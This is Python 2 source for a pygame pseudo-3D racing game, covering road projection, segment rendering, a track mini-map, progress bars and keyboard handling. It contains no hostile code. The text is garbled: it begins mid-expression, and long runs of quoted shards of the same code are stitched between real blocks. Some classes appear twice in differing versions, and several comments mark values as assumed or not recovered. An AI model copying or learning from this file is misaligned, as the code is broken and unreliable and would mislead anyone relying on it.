                     (xsr1 + xsl2) / 2.0, xsl1, xsl2]
            #x_sprt = random.choice(x_pos)
            x_i = random.randint(0, 4)  # not used now !!
            ##x_i = 2
            y_sprt = ys1
            scale_sprt = seg_scale * 8.0  #10.0#2.0
            obj = self.rd_sprts_render(seg, x_pos, x_i, y_sprt, scale_sprt)
        # render the sprites with right order
        for obj in self.rd_sprt_cache[::-1]:
            self.disp_add(obj)

    def render_polygon(self, surf, x1, y1, x2, y2, x3, y3, x4, y4, color):
        #pnts = [[x1, y1+a], [x2, y2+a], [x3, y3+a], [x4, y4+a], [x1, y1+a]]
        # reflect the y-
        d = 116
        pnts = [[x1, d-y1], [x2, d-y2], [x3, d-y3], [x4, d-y4], [x1, d-y1]]
        c = utils.clr_from_str(color)
        try:
            self.pygm.draw.polygon(self.surf, c, pnts)
        except Exception as e:
            #print '-' * 40
            print e
            #print c, pnts

    # earlier renderers kept in the source for reference:
    # rd_seg_render__1_o ("straight"),
    # rd_seg_render__2_o ("curve test 1", per-segment theta/tan x offsets),
    # rd_seg_render__3_o ("curve test 2: draw a circle", engi/rad cosines),
    # rd_seg_render__4_o ("curve", fixed curve_d per-segment offsets)
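    # Note on the d=116 reflection in render_polygon() (illustrative only):
    # ys values grow upward from the horizon while pygame surface y grows
    # downward, so a road-space point at ys=10 lands at surface row 116-10=106
    # on the 640x240 road strip:
    #
    #   ys = 10.0
    #   surface_y = 116 - ys   # = 106.0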
"y4+a], [x1, y1+a]] # reflect the y- d = 116", "in e_keys_up: if self.player_di != 1: self.player_di = 0 def", "k, v in seg.items(): if k not in ['sprites']: seg_c[k]", "starfish import pygm from starfish import consts from starfish import", "xs = w / 2.0 + xp return xs def", "self.cfg = cfg self.car = kwargs.get('car') self.bg_sky = kwargs.get('bg_sky') self.bg_hills", "seg['color']['grass']) self.render_polygon(None, xs1, ys1, xs2, ys2, xs4, ys4, xs3, ys3,", "= zw1 - self.camera_z - self.position zc2 = zw2 -", "{ 'LENGTH': {'NONE': 0, 'SHORT': 25, 'MEDIUM': 50, 'LONG': 100", "#self.spd.rotate(180) self.disp_add(self.spd) def rdmap_hide(self): self.rdmap.hide() def rdmap_reset(self): self.rdmap.clear() self.rdmap.draw_segs(self.road.rd_get_segs(whole=True), self.road.seg_len)", "except Exception as e: print e self.init_rd_segs_rand_1() else: if not", "self.xc_to_xp(xc4, self.d, zc2) xs4 = self.xp_to_xs(xp4, self.w) yp1 = self.yc_to_yp(yc,", "render the sprites with right order for obj in self.rd_sprt_cache[::-1]:", "= SptTmpx((40, 40)) #return o class FPSptRoadB(sptdraw.SptDrawBase): def __init__(self, size,", "100), c_prog=consts.YELLOW) self.prog.rect.top = 70#340 self.prog.rect.left = 610 #self.prog.rotate(180) self.disp_add(self.prog)", "if pos is None: pos = self.position i = int(pos", "self.player_seg = self.segments[segbi] self.base_seg = self.segments[(segbi + 2) % seg_n]", "y + 240 - obj.rect.height obj.rect.left = x_pos[x_i_saved] - obj.rect.width", "= obj.rect.width car_x = self.player_x car_w = self.car.rect.width * 2", "for n in range(enter): self.rd_seg_add(self.util_ease_in(0, curve, float(n)/enter), self.util_ease_out(start_y, end_y, float(n)/total))", "x_i == 3: sprt_at = -580 elif x_i == 4:", "self.disp_add(self.spd) def rdmap_hide(self): self.rdmap.hide() def rdmap_reset(self): self.rdmap.clear() self.rdmap.draw_segs(self.road.rd_get_segs(whole=True), self.road.seg_len) self.rdmap.rotate(90)", "* random.random() * 6.0 yw = 0.0 self.add_road(enter, hold, leave,", "rd_seg_init_rand_curve(self, n=5): #print 'rd_seg_init_rand', n for i in range(n): rl", "return events else: return self.check_key(events) def key_to_di(self, k): if k", "d-y3], [x4, d-y4], [x1, d-y1]] c = utils.clr_from_str(color) try: self.pygm.draw.polygon(self.surf,", "# hide / show road map self.rdmap_hide() elif k ==", "at rd_sprts_del_all_objs() ##del self.rd_sprt_objs[obj_k] img = FP_ROAD_SPRTS[sprt]['imgs'][0] obj = FPSptRdSprts.create_by_img(img)", "= 456 self.rdpsd.rect.left = 312 self.disp_add(self.rdpsd) self.scr = pygm.SptLbl(str(int(self.road.score)), c=consts.RED,", "ys1 = self.yp_to_ys(yp1, self.h) ys2 = ys1 yp3 = self.yc_to_yp(yc,", "-100,}, } class SptTmpx(sptdraw.SptDrawBase): def __init__(self, size, *args, **kwargs): super(SptTmpx,", "2 == 1: xpl1 = self.xc_to_xp(xcl1, self.d, zc1) xsl1 =", "dx_curve + seg.get('curve', 0.0) # for hills yw1 = seg['p1']['world'].get('y',", "'HILL': {'NONE': 0, 'LOW': 20, 'MEDIUM': 40, 'HIGH': 60 },", "140 }, 'TREE2': { 'x': 1205, 'y': 5, 'w': 282,", "self).__init__(size) self.cfg = cfg self.car = kwargs.get('car') self.bg_sky = kwargs.get('bg_sky')", "return obj def handle_event(self, events, *args, **kwargs): #print '>>> ',", "* math.pow(percent, 2) def util_ease_out(self, a, b, percent): return a", "FP_COLORS['START_Y'] #self.segments[2]['color'] = FP_COLORS['START_Y'] for i in range(n): self.segments[i]['color'] =", "map * TAB : replay this road * RETURN :", "/ self.seg_len)) #i = int(math.ceil(pos / self.seg_len)) seg_n = len(self.segments)", "* 
    def handle_event(self, events, *args, **kwargs):
        #print '>>> ', events
        if not self.flag_check_event:
            return events
        else:
            return self.check_key(events)

    def key_to_di(self, k):
        if k == self.pglc.K_UP:
            return 0
        elif k == self.pglc.K_RIGHT:
            return 1
        elif k == self.pglc.K_DOWN:
            return 2
        elif k == self.pglc.K_LEFT:
            return 3
        else:
            return None

    def key_to_di_b(self, k):
        if k == self.pglc.K_f or k == self.pglc.K_j:
            return 0
        elif k == self.pglc.K_k:
            return 1
        elif k == self.pglc.K_SPACE or k == self.pglc.K_v or k == self.pglc.K_n:
            return 2
        elif k == self.pglc.K_d:  # key for 3 assumed; not recovered
            return 3
        else:
            return None

    def check_key(self, events):
        #print id(events)
        r_events = []
        e_keys_up = []
        e_keys_dn = []
        for event in events:
            #print event
            if event.type == self.pglc.KEYUP:
                di = self.key_to_di(event.key)
                if di is None:
                    di = self.key_to_di_b(event.key)
                if di is not None:
                    e_keys_up.append(di)
                else:
                    r_events.append(event)
            elif event.type == self.pglc.KEYDOWN:
                di = self.key_to_di(event.key)
                if di is None:
                    di = self.key_to_di_b(event.key)
                if di is not None:
                    e_keys_dn.append(di)
                else:
                    r_events.append(event)
            else:
                r_events.append(event)
        self.e_keys_up = e_keys_up
        self.e_keys_dn = e_keys_dn
        return r_events

    def util_limit(self, value, mn, mx):
        return max(mn, min(value, mx))

    def util_accelerate(self, v, accel, dt):
        return v + (accel * dt)

    def util_increase(self, start, increment, mx):
        # with looping
        result = start + increment
        while (result >= mx):
            result -= mx
        while (result < 0):
            result += mx
        return result

    def util_ease_in(self, a, b, percent):
        return a + (b - a) * math.pow(percent, 2)

    def util_ease_out(self, a, b, percent):
        return a + (b - a) * (1 - math.pow(1 - percent, 2))

    def util_ease_in_out(self, a, b, percent):
        return a + (b - a) * ((-math.cos(percent * math.pi)/2) + 0.5)

    def util_curve_percent_remaining(self, n, total):
        return (n % total) / total

    def rd_seg_get_cleared(self, segs=None):
        if not segs:
            segs = self.segments
        segs_c = []
        for seg in segs:
            seg_c = {}
            for k, v in seg.items():
                if k not in ['sprites']:
                    seg_c[k] = v
                else:
                    seg_c[k] = []
                    for spr in seg['sprites']:
                        spr_n = {}
                        for sk, sv in spr.items():
                            if sk not in ['obj']:
                                spr_n[sk] = sv
                            else:
                                spr_n[sk] = None
                        seg_c[k].append(spr_n)
            segs_c.append(seg_c)
        return segs_c

    def rd_seg_json_save(self, f):
        sc = self.rd_seg_get_cleared(self.segments)
        s = utils.json_dumps(sc)
        with open(f, 'w') as fo:
            fo.write(s)

    def rd_seg_json_load(self, f):
        with open(f, 'r') as fi:
            s = fi.read()
        segs = utils.json_loads(s)
        return segs
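# Illustrative only: round-tripping a generated road through the JSON helpers
# above ('road' stands for an FPSptRoadB instance; the path is arbitrary):
#
#   road.rd_seg_json_save('sr_roads/sr_road.txt')
#   segs = road.rd_seg_json_load('sr_roads/sr_road.txt')
#   road.segments = segs
#   road.track_len = len(road.segments) * road.seg_len
#
# rd_seg_get_cleared() nulls the live 'obj' references first, so the dump
# holds only plain dict/list/number data.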
class FPSptRoadMap(sptdraw.SptDrawBase):
    def __init__(self, size, segs, rad, *args, **kwargs):
        super(FPSptRoadMap, self).__init__(size)
        self.segs = segs
        self.rad = rad
        #self.fill(consts.WHITE)
        self.draw_segs(self.segs, self.rad)

    def xy_to_cntr(self, x, y):
        return [self.size[0] / 2 + x,
                self.size[1] / 2 - y]

    def cv_to_engl(self, curve, rad):
        # map a segment's curve value to a turning angle
        a = float(curve) / rad
        #a *= 10.0
        #print a
        s = 1.0
        if a < 0.0:
            s = -1.0
        if a < -1.0:
            a = -1.0
        elif a > 1.0:
            a = 1.0
        #tht_d = math.acos(a)
        tht_d = math.asin(a)
        # TODO: tht (the sign s is currently unused)
        return tht_d

    def get_segs_pnts(self, segs, rad):
        pnts = []
        x, y = 0.0, 0.0
        tht = 0.0
        rad_m = 4.0  #2.0#1.0#
        pnts.append([x, y])
        for seg in segs:
            curve = seg.get('curve', 0.0)
            if curve == 0.0:
                rad_m = 1.0  #0.1#
            else:
                tht_d = self.cv_to_engl(curve, rad)
                tht += tht_d
                rad_m = 10.0  #50.0#
            x += rad_m * math.cos(tht)
            y += rad_m * math.sin(tht)
            pnts.append([x, y])
        #print pnts
        return pnts

    def get_segs_pnts_1(self, segs, rad):
        # variant: accumulate a whole curve run before turning once
        pnts = []
        x, y = 0.0, 0.0
        tht = 0.0
        rad_m = 4.0  #2.0#1.0#
        cv_s = 0
        cv_l = 0.0
        pnts.append([x, y])
        for seg in segs:
            curve = seg.get('curve', 0.0)
            if curve == 0.0:
                if cv_s:
                    tht_d = self.cv_to_engl(cv_l, rad)
                    #tht += tht_d
                    tht -= tht_d
                    rad_m = 20.0  #10.0#50.0#
                    cv_s = 0
                    cv_l = 0.0
                else:
                    rad_m = 0.5  #1.0#0.1#
            else:
                if cv_s:
                    cv_l += curve
                else:
                    cv_s = 1
                    cv_l = curve
            x += rad_m * math.cos(tht)
            y += rad_m * math.sin(tht)
            pnts.append([x, y])
        return pnts

    def draw_segs(self, segs, rad):
        pnts = self.get_segs_pnts(segs, rad)
        #print pnts
        if len(pnts) <= 1:
            return
        #if len(pnts) > 0:
        #    pnts.append(pnts[0])
        cpnts = [self.xy_to_cntr(p[0], p[1]) for p in pnts]
        c = consts.GREEN  # line colour assumed; not recovered
        #print c, cpnts
        self.pygm.draw.lines(self.surf, c, False, cpnts, 3)


class FPSptProgress(sptdraw.SptDrawBase):
    def __init__(self, size, c_bg=consts.BLUE, c_prog=consts.GREEN):
        super(FPSptProgress, self).__init__(size)
        self.c_bg = c_bg
        self.c_prog = c_prog
        self.progress(0.0)

    def progress(self, prog):
        y = self.size[1] * prog
        self.fill(self.c_bg)
        #self.pygm.draw.rect(self.surf, consts.GREEN,
        #                    [1, 0, self.size[0] - 2, y])
        # from down to up
        self.pygm.draw.rect(self.surf, self.c_prog,
                            [1, self.size[1] - y, self.size[0] - 2, y])
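# Illustrative only: FPSptProgress is a thin vertical bar that fills
# bottom-up; FPStraight below uses two of them for progress and speed:
#
#   spd = FPSptProgress((4, 100), c_prog=consts.GREEN)
#   spd.progress(0.25)   # paints the bottom quarter of the 4x100 bar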
class FPStraight(pygm.PyGMScene):  # base class assumed; not recovered
    def __init__(self, cfg, *args, **kwargs):
        super(FPStraight, self).__init__(*args, **kwargs)
        self.cfg = cfg
        # two copies of each background layer, side by side, so update_bg()
        # can wrap them around while scrolling
        self.bg_sky1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['SKY'])
        self.bg_sky1.rect.top = 0
        self.bg_sky1.rect.left = 0
        self.disp_add(self.bg_sky1)
        self.bg_sky2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['SKY'])
        self.bg_sky2.rect.top = 0
        self.bg_sky2.rect.left = self.bg_sky1.rect.width
        self.disp_add(self.bg_sky2)
        self.bg_hills1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['HILLS'])
        self.bg_hills1.rect.top = 0
        self.bg_hills1.rect.left = 0
        self.disp_add(self.bg_hills1)
        self.bg_hills2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['HILLS'])
        self.bg_hills2.rect.top = 0
        self.bg_hills2.rect.left = self.bg_hills1.rect.width
        self.disp_add(self.bg_hills2)
        self.bg_trees1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['TREES'])
        self.bg_trees1.rect.top = 0
        self.bg_trees1.rect.left = 0
        self.disp_add(self.bg_trees1)
        self.bg_trees2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['TREES'])
        self.bg_trees2.rect.top = 0
        self.bg_trees2.rect.left = self.bg_trees1.rect.width
        self.disp_add(self.bg_trees2)
        self.car = FPSptSprts('img_flatpath/images/sprites.png', IMG_POS_SPRITES['PLAYER_STRAIGHT'])
        #print self.road.cameraDepth/self.road.playerZ
        #self.car.scale(self.road.cameraDepth/self.road.playerZ)
        self.car.scale(2)
        self.car.rect.top = 400
        self.car.rect.left = (640 - self.car.rect.width) / 2  # centring assumed
        # NOTE: the car is display-added after the road
        #self.road = FPSptRoad((640, 240), self.cfg)
        self.road = FPSptRoadB((640, 240), self.cfg,
                               car=self.car,
                               bg_sky=[self.bg_sky1, self.bg_sky2],
                               bg_hills=[self.bg_hills1, self.bg_hills2])
        self.road.rect.top = 240
        self.road.rect.left = 0
        self.disp_add(self.road)
        self.disp_add(self.car)
        self.rdmap = FPSptRoadMap((480, 480),  # width assumed
                                  self.road.rd_get_segs(whole=True), self.road.seg_len)
        self.rdmap.rect.top = 0
        self.rdmap.rect.left = 80
        self.rdmap.rotate(90)
        self.disp_add(self.rdmap)
        self.rdpsd = pygm.SptLbl(str(int(self.road.speed)), c=consts.GREEN, font_size=12)
        self.rdpsd.rect.top = 456
        self.rdpsd.rect.left = 312
        self.disp_add(self.rdpsd)
        self.scr = pygm.SptLbl(str(int(self.road.score)), c=consts.RED, font_size=16)
        self.scr.rect.top = 40  #454
        self.scr.rect.left = 600
        self.disp_add(self.scr)
        self.tm_once = pygm.SptLbl(str(int(self.road.tm_last_once)), c=consts.YELLOW, font_size=16)
        self.tm_once.rect.top = 20  #454
        self.tm_once.rect.left = 600
        self.disp_add(self.tm_once)
        self.prog = FPSptProgress((4, 100), c_prog=consts.YELLOW)
        self.prog.rect.top = 70  #340
        self.prog.rect.left = 610
        #self.prog.rotate(180)
        self.disp_add(self.prog)
        self.spd = FPSptProgress((4, 100), c_prog=consts.GREEN)
        self.spd.rect.top = 70  #340
        self.spd.rect.left = 602
        #self.spd.rotate(180)
        self.disp_add(self.spd)

    def rdmap_hide(self):
        self.rdmap.hide()

    def rdmap_reset(self):
        self.rdmap.clear()
        self.rdmap.draw_segs(self.road.rd_get_segs(whole=True), self.road.seg_len)

    def road_reset(self):
        self.road.rd_reset()
        self.rdmap_reset()

    def road_reset_keep_segs(self):
        self.road.rd_reset(init=False, keep_segs=True)

    def road_reset_from_file(self, segs_file='sr_roads/sr_road.txt'):
        segs_file = utils.dir_abs(segs_file, __file__)
        self.road.rd_reset(init=False, segs_file=segs_file)
        self.rdmap_reset()

    def road_segs_to_file(self, segs_file=None):
        if not segs_file:
            segs_file = 'sr_roads/sr_road_' + str(int(time.time())) + '.txt'
        segs_file = utils.dir_abs(segs_file, __file__)
        self.road.rd_seg_json_save(segs_file)

    def handle_event(self, events, *args, **kwargs):
        #return events
        r_events = []
        for event in events:
            if event.type == self.pglc.KEYUP:
                k = event.key
                if k == self.pglc.K_SPACE:
                    # hide / show road map
                    self.rdmap_hide()
                elif k == self.pglc.K_RETURN:
                    self.road_reset()
                elif k == self.pglc.K_TAB:
                    self.road_reset_keep_segs()
                elif k == self.pglc.K_BACKSPACE:
                    self.road_reset_from_file()
                elif k == self.pglc.K_SLASH:
                    self.road_segs_to_file()
                else:
                    r_events.append(event)
            elif event.type == self.pglc.KEYDOWN:
                r_events.append(event)
            else:
                r_events.append(event)
        return r_events

    def refresh(self, fps_clock, *args, **kwargs):
        self.rdpsd.lbl_set(str(int(self.road.speed)))
        self.scr.lbl_set(str(int(self.road.score)))
        self.tm_once.lbl_set(str(int(self.road.tm_last_once)))
        # track progress and speed as fractions (progress formula assumed)
        progc = self.road.position / self.road.track_len
        self.prog.progress(progc)
        spdc = self.road.speed / self.road.speed_max
        self.spd.progress(spdc)
self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['MEDIUM'])", "'w': 88, 'h': 55 }, 'CAR02': { 'x': 1383, 'y':", "tht = 0.0 rad_m = 4.0#2.0#1.0# cv_s = 0 cv_l", "* (d / zc) return yp def xp_to_xs(self, xp, w):", "['sprites']: seg_c[k] = v else: seg_c[k] = [] for spr", "self.position for i, seg in enumerate(self.segments): zw1 = seg['p1']['world']['z'] zw2", "for seg in segs: curve = seg.get('curve', 0.0) if curve", "pass x_i_saved = info.get('x_i') #if not x_i_saved: # info['x_i'] =", "* (i + 1)) xc1 = (rad - xx1) -", "sprites with right order for obj in self.rd_sprt_cache[::-1]: self.disp_add(obj) def", "self.player_seg['p1']['world']['z'] #print 'world y', self.player_seg['p1']['world'].get('y', 0.0) # clear the sprites", "def check_tm(self): if self.position > self.seg_len * 2: if self.tm_start", "not x_i_saved: # info['x_i'] = x_i # x_i_saved = x_i", "curve_d * i xp1 = self.xc_to_xp(xc1, self.d, zc1) xs1 =", "self.road.speed / self.road.speed_max self.spd.progress(spdc) class FPSceneA(pygm.PyGMScene): def __init__(self, *args, **kwargs):", "fps_clock, *args, **kwargs): self.check_player_di(self.e_keys_dn, self.e_keys_up) self.draw_on() self.rd_seg_render() self.update_world() self.check_if_car_out_road() self.check_score()", "= 0 #print 'b_curve', b_curve #print 'world z', self.player_seg['p1']['world']['z'] #print", "for hill in self.bg_hills: hill.rect.left += int(self.hill_speed * p_dt) if", "{'imgs': ['img_sprts/ashra_defeat1.png'], 'score': -100,}, #'bear': {'imgs': ['img_sprts/bear2.png'], 'score': -80,}, #'dinof':", "'y': 961, 'w': 80, 'h': 45 }, 'PLAYER_UPHILL_STRAIGHT': { 'x':", "self.yp = 0.0 self.xs = 0.0 self.ys = 0.0 self.d", "= random.randint(1, self.road_w / 2 - 10) * seg_scale #x_sprt", "f): sc = self.rd_seg_get_cleared(self.segments) s = utils.json_dumps(sc) with open(f, 'w')", "['img_sprts/rock_d2.png'], 'score': -10,}, 'rockr': {'imgs': ['img_sprts/rock_r2.png'], 'score': -50,}, #'ashra_defeat': {'imgs':", "#if not init and not keep_segs: if not init: self.rd_sprts_del_all_objs()", "* i theta2 = theta_i * (i + 1) dx1", "**kwargs): super(FPSptRdSprts, self).__init__(img_file) @classmethod def create_by_img(cls, img): return cls(img) #", "import utils IMG_POS_BACKGROUND = { 'HILLS': { 'x': 5, 'y':", "* d, self.size[0], d] #ca = 255 / n *", "def __init__(self, img_file, pos, *args, **kwargs): super(FPSptSprts, self).__init__(img_file, pos) class", "d, zc): if zc == 0.0: #xp = float('inf') #xp", "k == self.pglc.K_j: return 0 elif k == self.pglc.K_k: return", "[self.size[0] / 2 + x, self.size[1] / 2 - y]", "* math.cos(tht) y += rad_m * math.sin(tht) pnts.append([x, y]) #print", "(xsr1 + xsl1) / 2.0 #x_sprt = random.choice(x_pos) x_i =", "{ 'x': 1205, 'y': 1018, 'w': 80, 'h': 56 },", "in self.bg_sky: #print sky sky.rect.left += int(self.sky_speed * p_dt) #", "1295, 'y': 1018, 'w': 80, 'h': 45 }, 'PLAYER_UPHILL_RIGHT': {", "= h / 2.0 - h / 2.0 * yp", "'lane': '#CCCCCC'}, } FP_ROAD = { 'LENGTH': {'NONE': 0, 'SHORT':", "zw2 = seg['p2']['world']['z'] zc1 = zw1 - self.camera_z - self.position", "'curve': curve, 'color': c, 'sprites': [], 'looped': 0, } self.segments.append(seg)", "self.bg_hills2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['HILLS']) self.bg_hills2.rect.top = 0 self.bg_hills2.rect.left = self.bg_hills1.rect.width", "self.road.rd_reset() 

class SptTmpx(sptdraw.SptDrawBase):
    """Placeholder sprite: a white disc on a green square."""

    def __init__(self, size, *args, **kwargs):
        super(SptTmpx, self).__init__(size)
        self.draw_on()

    def draw_on(self, *args, **kwargs):
        self.fill(consts.GREEN)
        self.pygm.draw.circle(
            self.surf, consts.WHITE,
            (self.size[0] / 2, self.size[1] / 2),
            self.size[0] / 2, 0)


class SptTmpi(pygm.SptImg):
    """Placeholder sprite loaded from an image file."""

    def __init__(self, img_file, *args, **kwargs):
        super(SptTmpi, self).__init__(img_file)


class FPSptBg(pygm.SptImgOne):
    """One background layer (sky / hills / trees) cut from the atlas."""

    def __init__(self, img_file, pos, *args, **kwargs):
        super(FPSptBg, self).__init__(img_file, pos)


class FPSptSprts(pygm.SptImgOne):
    """A sprite cut from the sprites atlas (the player car, etc.)."""

    def __init__(self, img_file, pos, *args, **kwargs):
        super(FPSptSprts, self).__init__(img_file, pos)


class FPSptFog(sptdraw.SptDrawBase):
    """A horizontal fog band: stacked 2px strips whose alpha fades out."""

    def __init__(self, size, c=[0, 81, 8, 0], h=30, *args, **kwargs):
        super(FPSptFog, self).__init__(size)
        self.c = c
        self.h = h
        self.draw_on()

    def draw_on(self, *args, **kwargs):
        d = 2
        n = self.h / d
        for i in range(n):
            rct = [0, i * d, self.size[0], d]
            ca = 200 / n * (n - i)  # strongest at the top, fading downwards
            self.c[3] = ca
            self.pygm.draw.rect(self.surf, self.c, rct)


class FPSptProgress(sptdraw.SptDrawBase):
    """A thin vertical progress bar (track progress, speed)."""

    def __init__(self, size, c_bg=consts.BLUE, c_prog=consts.GREEN):
        super(FPSptProgress, self).__init__(size)
        self.c_bg = c_bg
        self.c_prog = c_prog
        self.progress(0.0)

    def progress(self, prog):
        y = self.size[1] * prog
        self.fill(self.c_bg)
        # fill from the bottom up
        self.pygm.draw.rect(
            self.surf, self.c_prog,
            [1, self.size[1] - y, self.size[0] - 2, y])

class FPSptRoadMap(sptdraw.SptDrawBase):
    """Top-down mini-map of the whole track, drawn as a polyline."""

    def __init__(self, size, segs, rad, *args, **kwargs):
        super(FPSptRoadMap, self).__init__(size)
        self.segs = segs
        self.rad = rad
        self.draw_segs(self.segs, self.rad)

    def xy_to_cntr(self, x, y):
        # map world (x, y) to surface coords with the origin at the center
        return [self.size[0] / 2 + x, self.size[1] / 2 - y]

    def cv_to_engl(self, curve, rad):
        # turn an accumulated curve value into a heading change (radians)
        a = float(curve) / rad
        if a < -1.0:
            a = -1.0
        elif a > 1.0:
            a = 1.0
        tht_d = math.asin(a)
        return tht_d

    def get_segs_pnts(self, segs, rad):
        pnts = []
        x, y = 0.0, 0.0
        tht = 0.0
        rad_m = 4.0   # map units advanced per segment
        cv_s = 0      # currently inside a curved stretch?
        cv_l = 0.0    # accumulated curve of that stretch
        pnts.append([x, y])
        for seg in segs:
            curve = seg.get('curve', 0.0)
            if curve == 0.0:
                if cv_s:
                    # a curved stretch just ended: bend the heading once
                    tht_d = self.cv_to_engl(cv_l, rad)
                    tht -= tht_d
                    cv_s = 0
                    cv_l = 0.0
            else:
                if cv_s:
                    cv_l += curve
                else:
                    cv_s = 1
                    cv_l = curve
            x += rad_m * math.cos(tht)
            y += rad_m * math.sin(tht)
            pnts.append([x, y])
        return pnts

    def draw_segs(self, segs, rad):
        pnts = self.get_segs_pnts(segs, rad)
        if len(pnts) <= 1:
            return
        cpnts = [self.xy_to_cntr(p[0], p[1]) for p in pnts]
        c = utils.clr_from_str(FP_COLOR_BLUE)
        self.pygm.draw.lines(self.surf, c, False, cpnts, 3)
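
# --- illustrative sketch (not part of the game) ----------------------------
# How the mini-map turns accumulated segment curvature into a heading change:
# the summed 'curve' of a stretch is divided by the rad parameter (FPStraight
# passes the road's seg_len here), clamped into [-1, 1], and asin() gives the
# bend angle. A self-contained rehearsal (the helper name is hypothetical):
def _bend_angle_demo(curve_sum, rad):
    a = max(-1.0, min(1.0, float(curve_sum) / rad))
    return math.asin(a)

# e.g. a stretch that accumulated curve 4.0 against rad 200.0 bends the
# polyline by asin(0.02), roughly 0.02 radians:
# _bend_angle_demo(4.0, 200.0)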
"c_bg self.c_prog = c_prog self.progress(0.0) def progress(self, prog): y =", "image / animate / ... 'obj': None, # need to", "yw n = len(self.segments) #print n if n % 2", "0 self.disp_add(self.bg_hills1) self.bg_hills2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['HILLS']) self.bg_hills2.rect.top = 0 self.bg_hills2.rect.left", "-= 1 #self.score -= 1 #if self.score < 0: #", "segs_file=None): #if not init and not keep_segs: if not init:", "self.xc_to_xp(xcl2, self.d, zc1) xsl2 = self.xp_to_xs(xpl2, self.w) xpl3 = self.xc_to_xp(xcl3,", "= (i+2)*self.seg_len #''' # <1> zw1 = seg['p1']['world']['z'] zw2 =", "[x3, y3+a], [x4, y4+a], [x1, y1+a]] # reflect the y-", "p_curve * self.centrifugal #print p_dt #self.player_x -= p_dt self.player_x +=", "5, 'y': 897, 'w': 298, 'h': 190 }, 'BILLBOARD07': {", "self.fill(self.clr_dark_grass) def add_fog(self): self.fog = FPSptFog(self.size) self.fog.rect.top = 240 self.fog.rect.left", "= self.road.speed / self.road.speed_max self.spd.progress(spdc) class FPSceneA(pygm.PyGMScene): def __init__(self, *args,", "super(FPSptRoadMap, self).__init__(size) self.segs = segs self.rad = rad #self.fill(consts.WHITE) self.draw_segs(self.segs,", "= -230 self.bk.rect.left = -230 #self.disp_add(self.bk) self.scn1 = FPSceneA() self.disp_add(self.scn1)", "xc1 - x_curve xc2 = xc2 - x_curve xc3 =", "def road_segs_to_file(self, segs_file=None): if not segs_file: segs_file = 'sr_roads/sr_road_' +", "#self.player_x -= dpx1 # <1> #for i, seg in enumerate(self.segments):", "import pygm from starfish import consts from starfish import sptdraw", "+ 2) * self.seg_len, 'y': yw}, 'camera': {}, 'screen': {}},", "% 2 == 1: xpl1 = self.xc_to_xp(xcl1, self.d, zc1) xsl1", "self.seg_lasy_y() end_y = start_y + (int(yw) * self.seg_len) total =", "rad): pnts = self.get_segs_pnts(segs, rad) #print pnts if len(pnts) <=", "sky.rect.left - sky.rect.width > 0: sky.rect.left -= sky.rect.width * 2", "(rad - xx4) - self.player_x xp1 = self.xc_to_xp(xc1, self.d, zc1)", "= rl * random.random() * 8.0 yw = 0.0 self.add_road(enter,", "self.spd = FPSptProgress((4, 100), c_prog=consts.GREEN) self.spd.rect.top = 70#340 self.spd.rect.left =", "self.rd_seg_init(random.randint(1, 10)) # for a3c train self.rd_seg_init_rand_curve() #self.add_curves() #self.add_low_rolling_hills(20, 2.0)", "= self.yc_to_yp(yc1, self.d, zc1) ys1 = self.yp_to_ys(yp1, self.h) ys2 =", "['img_sprts/chick_fly3.png'], 'score': 70,}, 'clown': {'imgs': ['img_sprts/clown1.png'], 'score': -100,}, } class", "FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], rl * FP_ROAD['CURVE']['MEDIUM']) elif p < 0.7: self.add_road(FP_ROAD['LENGTH']['MEDIUM'],", "* p_dt) # always move the cloud #sky.rect.left -= self.sky_speed", "need to create at render ##'x_i': None, # get real", "FPStraight(pygm.PyGMSprite): def __init__(self, cfg, *args, **kwargs): super(FPStraight, self).__init__() self.cfg =", "= 0.0 self.yp = 0.0 self.xs = 0.0 self.ys =", "* i) xx2 = rad2 * math.cos(engi * i) xx3", "= (segbi + i) % seg_n #print si seg =", "'h': 190 }, 'BOULDER2': { 'x': 621, 'y': 897, 'w':", "* i # <3> xx1 = rad1 * math.cos(engi *", "'w': 320, 'h': 220 }, 'COLUMN': { 'x': 995, 'y':", "{} self.rd_sprt_cache = [] # for sprites render order self.track_len", "# need to create at render ##'x_i': None, # get", "self.lane_w, # rd_w_half - self.lane_w] sprt_x = obj.rect.left sprt_w =", "self.lane_w = 60 self.seg_n = 300#200 #self.seg_draw_n = 200#150 self.seg_draw_n", "segs # #### geometry #### # def geo_prjc_scale(self, d, zc):", "self.lane_w 
#xcl3 = xc3 - self.lane_w #xcl4 = xc4 +", "'x': 1383, 'y': 894, 'w': 80, 'h': 57 }, 'CAR01':", "+= dx1 xs2 += dx1 xs3 += dx2 #+ dx1", "cfg, *args, **kwargs): super(FPStraight, self).__init__() self.cfg = cfg self.bg_sky1 =", "2.0) ##self.add_low_rolling_hills(30, 4.0) #self.rd_seg_init_rand(10)#50#10#3#1 #segnrand = random.randint(3, 30) segnrand =", "GMFlatpath('flatpath <:::>', 640, 480) sf = GMFlatpath('flatpath <:::>', 640, 480,", "= None # the segment just under the car self.player_di", "= 500.0#1000.0#0.0 == self.camera_h self.xw = 0.0 self.yw = 0.0", "p_dt def check_if_car_out_road(self): # decrease score when go out the", "SptTmpx((40, 40)) #return o class FPSptRoadB(sptdraw.SptDrawBase): def __init__(self, size, cfg,", "xsr1, ys1, xsr2, ys2, xsr4, ys4, xsr3, ys3, seg['color']['rumble']) def", "= 0.0 self.camera_z = 500.0#1000.0#0.0 == self.camera_h self.xw = 0.0", "* more road sprites * sound \"\"\" import math import", "else: if cv_s: cv_l += curve else: cv_s = 1", "self.road_w / 2: if self.score > 0: self.score -= 1", "2.0 #y_sprt 